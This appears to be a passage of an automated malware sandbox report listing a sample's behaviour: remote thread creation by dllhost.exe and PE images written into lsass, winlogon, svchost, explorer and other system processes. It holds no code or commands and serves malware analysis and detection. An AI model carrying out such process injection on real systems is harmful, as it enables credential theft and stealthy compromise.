Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 21F22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 21F52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 756E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 75712EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C6722EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C6752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5462EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5492EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 448A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 448D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B9BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B9BF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A942EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3BA52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0942EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: E8A52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6102EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D9CC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F4012EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A4742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A4AE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ACC52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ACD72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 88E02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 71D92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 91062EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 73E62EBC

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 26DB1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 26DB1630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22382770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1486AD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24BD3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 269BA660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22055340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C57DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A333B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2036E550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2036E550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 239543A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B9C9A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B9C9CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29F0AD90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29F0ADC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C585A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C585A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BEA4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BEA41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13A0000 value starts with: 4D5A
